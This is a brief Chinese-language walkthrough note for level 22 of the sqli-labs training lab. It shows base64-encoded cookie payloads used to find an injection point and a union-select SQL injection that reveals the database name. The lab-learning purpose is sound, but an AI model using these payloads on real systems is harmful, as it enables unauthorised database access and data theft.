Sqli-labs-Less-22 (笔记)
这一关与20关相似
只不过这一次将’)换为"并编码即可
使用admin登录 并用burp抓包
查找注入点
编码前:admin’
编码后:YWRtaW4n
未登录并没有提醒
编码前:admin"
编码后:YWRtaW4i
报错
加上注释
编码前:admin"#
编码后:YWRtaW4iIw==
成功登录说明存在注入点
查看当前数据库
编码前:" union select 1,2,database()#
编码后:IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
以下步骤与Sqli-labs-Less-20相似
注意:Sqli-labs-Less-22是"并且需要编码
Sqli-labs-Less-20是’不需要编码
链接:Sqli-labs-Less-20